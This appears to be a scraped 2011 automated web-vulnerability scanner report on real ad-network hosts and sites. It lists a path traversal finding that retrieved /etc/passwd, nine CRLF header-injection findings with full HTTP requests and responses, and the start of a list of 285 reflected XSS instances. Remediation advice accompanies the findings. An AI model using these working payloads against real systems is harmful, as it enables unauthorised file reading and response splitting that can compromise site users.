Sorry but this page doesn't exist anymore.

2. File path traversal previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www2.glam.com
Path:	/app/site/affiliate/viewChannelModule.act

Issue detail

The mName parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload viewAdJs../../../../../../../../etc/passwd%00viewAdJs was submitted in the mName parameter. The requested file was returned in the application's response.

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, and by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:

User-controllable data should be strictly validated before being passed to any filesystem operation. In particular, input containing dot-dot sequences should be blocked.
After validating user input, the application can use a suitable filesystem API to verify that the file to be accessed is actually located within the base directory used by the application. In Java, this can be achieved by instantiating a java.io.File object using the user-supplied filename and then calling the getCanonicalPath method on this object. If the string returned by this method does not begin with the name of the start directory, then the user has somehow bypassed the applicationís input filters, and the request should be rejected. In ASP.NET, the same check can be performed by passing the user-supplied filename to the System.Io.Path.GetFullPath method and checking the returned string in the same way as described for Java.
The directory used to store files that are accessed using user-controllable data can be located on a separate logical volume to other sensitive application and operating system files, so that these cannot be reached via path traversal attacks. In Unix-based systems, this can be achieved using a chrooted filesystem; on Windows, this can be achieved by mounting the base directory as a new logical drive and using the associated drive letter to access its contents.

Request

GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs../../../../../../../../etc/passwd%00viewAdJs&affiliateId=1000212071&adSize=300x250 HTTP/1.1
Host: www2.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Cache-Control: max-age=3600
Date: Mon, 13 Jun 2011 11:09:34 GMT
Content-Length: 2011
Connection: close

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwa
...[SNIP]...

3. HTTP header injection previous next
There are 9 instances of this issue:

http://ad.doubleclick.net/pfadj/imdb2.consumer.title/maindetails [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/pfadj/imdb2.consumer.title/maindetails [tile parameter]
http://ad.doubleclick.net/pfadx/fansided_cim/ [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/pfadx/fansided_cim/ [secure parameter]
http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php [ES cookie]
http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM [REST URL parameter 2]
http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]
http://www22.glam.com/cTagsImgCmd.act [gname parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

3.1. http://ad.doubleclick.net/pfadj/imdb2.consumer.title/maindetails [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/pfadj/imdb2.consumer.title/maindetails

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 14526%0d%0a7db69468a61 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadj/imdb2.consumer.title/maindetails;tile=3;sz=1x1,4x1;p=f1;ifb=pf;ct=com;k=p;g=dr;id=tt0944947;tt=tv;coo=usa;g=f;b=t25;;u=4726988386828452;ord=4726988386828452?&14526%0d%0a7db69468a61=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1016
DCLK_imp: v7;j;211364898;0-0;2;32554139;4/1;42349616/42367403/1;;~okv=;tile=3;sz=1x1,4x1;p=f1;ifb=pf;ct=com;k=p;g=dr;id=tt0944947;tt=tv;coo=usa;g=f;b=t25;;u=4726988386828452;;14526
7db69468a61=1;~cs=i:
Date: Mon, 13 Jun 2011 11:24:46 GMT

document.write('\n\n<!--\nUSEFUL DFP PLACEHOLDERS :\n DFP Click Thru : http://ad.doubleclick.net/click%3Bh%3Dv
...[SNIP]...

3.2. http://ad.doubleclick.net/pfadj/imdb2.consumer.title/maindetails [tile parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/pfadj/imdb2.consumer.title/maindetails

Issue detail

The value of the tile request parameter is copied into the DCLK_imp response header. The payload 8c2e6%0d%0a02125434862 was submitted in the tile parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadj/imdb2.consumer.title/maindetails;tile=8c2e6%0d%0a02125434862 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 240
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:24:29 GMT
Expires: Mon, 13 Jun 2011 11:24:29 GMT
DCLK_imp: v7;j;44306;0-0;0;32554139;0/0;0/0/0;;~okv=;tile=8c2e6
02125434862;~cs=t:

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/v;44306;0-0;0;32554139;255-0/0;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt
...[SNIP]...

3.3. http://ad.doubleclick.net/pfadx/fansided_cim/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/pfadx/fansided_cim/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload a5537%0d%0a4e1cfeec7e4 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/fansided_cim/;secure=false;canopy_allowed=false;position=1;ic13=1;sz=24x24;dcmt=text/html;ord=1307962894346?&a5537%0d%0a4e1cfeec7e4=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_10_2&protocol=http%3A&network=fansided
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 985
DCLK_imp: v7;x;241934735;0-0;0;63616830;24/24;42394853/42412640/1;;~aopt=3/2/ff/0;~okv=;secure=false;canopy_allowed=false;position=1;ic13=1;sz=24x24;dcmt=text/html;;a5537
4e1cfeec7e4=1;~cs=k:
Date: Mon, 13 Jun 2011 11:02:01 GMT

DoubleClick.onAdLoaded('MediaAlert',{"impression":"http://ad.doubleclick.net/imp;v7;x;241934735;0-0;0;63616830;24/24;42394853/42412640/1;;~aopt=3/2/ff/0;~okv=;secure=false;canopy_allowed=false;positio
...[SNIP]...

3.4. http://ad.doubleclick.net/pfadx/fansided_cim/ [secure parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/pfadx/fansided_cim/

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload 7615e%0d%0af9020d9662b was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/fansided_cim/;secure=7615e%0d%0af9020d9662b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_10_2&protocol=http%3A&network=fansided
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:01:56 GMT
Expires: Mon, 13 Jun 2011 11:01:56 GMT
DCLK_imp: v7;x;44306;0-0;0;63616830;0/0;0/0/0;;~aopt=2/2/ff/0;~okv=;secure=7615e
f9020d9662b;~cs=c:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/h;44306;0-0;0;63616830;783-50/50;0/0/0;;~aopt=2/2/ff/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

3.5. http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php [ES cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d724925/2/725047/adscout.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 7f396%0d%0a95abbdc4443 was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d724925/2/725047/adscout.php?ord=4df5ee2b64ddd HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1; ES=7f396%0d%0a95abbdc4443

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:12:22 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a210.dl
Set-Cookie: CS1=deleted; expires=Sun, 13-Jun-2010 11:12:21 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2; expires=Fri, 03-Aug-2012 03:12:22 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=7f396
95abbdc4443_724925-zSN:M-0; expires=Fri, 03-Aug-2012 03:12:22 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

3.6. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 58567%0d%0ab0067a605a1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /c/58567%0d%0ab0067a605a1/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM?pv=4694778565.317392&cookie=&width=300&height=250&x=0&y=0&keyw=&cpm=g)))TfX9OwANT9wK5X7HoUIl-3PEgN44d0Iq9sK8DQ HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307984779&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966778417&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307966778450&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=785162123&ga_fc=1&u_tz=-300&u_his=15&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895298&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=1095&xpc=a0nyvi7KDh&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=d10276ea02f90b643e343970f448660f

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Mon, 13 Jun 2011 12:07:00 GMT
Connection: keep-alive
Set-Cookie: __adroll=d10276ea02f90b643e343970f448660f; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/r/58567
b0067a605a1/SDUW4IOBWFCKJBD7TJN7TI/7e0e346171a4d3507190678e09366eb4.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

3.7. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 6eb1e%0d%0a31147183afa was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=6eb1e%0d%0a31147183afa&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:6eb1e
31147183afa;expires=Tue, 14 Jun 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:49 GMT;path=/;domain=.zedo.com;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:49 GMT
Content-Length: 2417
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',6eb1e
3114
...[SNIP]...

3.8. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload e47fa%0d%0ac6a295f0dc0 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=e47fa%0d%0ac6a295f0dc0&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:e47fa
c6a295f0dc0;expires=Tue, 14 Jun 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:47 GMT;path=/;domain=.zedo.com;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:47 GMT
Content-Length: 2417
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',e47fa
c6a2
...[SNIP]...

3.9. http://www22.glam.com/cTagsImgCmd.act [gname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.glam.com
Path:	/cTagsImgCmd.act

Issue detail

The value of the gname request parameter is copied into the Set-Cookie response header. The payload bc557%0d%0a14ab2681ee8 was submitted in the gname parameter. This caused a response containing an injected HTTP header.

Request

GET /cTagsImgCmd.act?gtid=5000000440&gcmd=setc&gexpires=172800&gname=bc557%0d%0a14ab2681ee8&gvalue=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771 HTTP/1.1
Host: www22.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://www35t.glam.com/jsadimp.gif?1^0^929ce6feb36d1ee96e6acadee107c6f7^115232130551023312111^1^446224^/^1x1^5000000440^31230390^-1^-1^-1^-1^0^0^6971307962974364^p^^0^^US^511^0^0^0^WASHINGTON^0^0^0^0^^bc557
Set-Cookie: bc557
14ab2681ee8=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771; expires=Wed, 15 Jun 2011 11: 02:54 GMT; path=/; domain=.glam.com;
ETag: "662c9bddfc82c61ba8066514fc2b172e:1276888104"
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
Cache-Control: max-age=144
Date: Mon, 13 Jun 2011 11:02:54 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

4. Cross-site scripting (reflected) previous next
There are 285 instances of this issue:

http://a.collective-media.net/adj/cm.mtv/ent_010111 [REST URL parameter 2]
http://a.collective-media.net/adj/cm.mtv/ent_010111 [REST URL parameter 3]
http://a.collective-media.net/adj/cm.mtv/ent_010111 [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/cm.mtv/ent_010111 [sz parameter]
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [adurl parameter]
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [ai parameter]
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [client parameter]
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [num parameter]
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [sig parameter]
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [sz parameter]
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [adurl parameter]
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [ai parameter]
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [client parameter]
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [num parameter]
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [sig parameter]
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [sz parameter]
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_a parameter]
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_d parameter]
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_eo parameter]
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_et parameter]
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_o parameter]
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_pm parameter]
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_pn parameter]
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_s parameter]
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [redirect parameter]
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [sz parameter]
http://ad.doubleclick.net/adj/cm.mtv/ent_010111 [net parameter]
http://ad.doubleclick.net/adj/gm.kotaku/e3 [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/adj/gm.kotaku/e3 [ptile parameter]
http://ad.doubleclick.net/adj/gm.kotaku/pax [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/adj/gm.kotaku/pax [ptile parameter]
http://ad.doubleclick.net/adj/gm.kotaku/pc [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/adj/gm.kotaku/pc [ptile parameter]
http://ad.doubleclick.net/adj/oiq.rmx/ [click0 parameter]
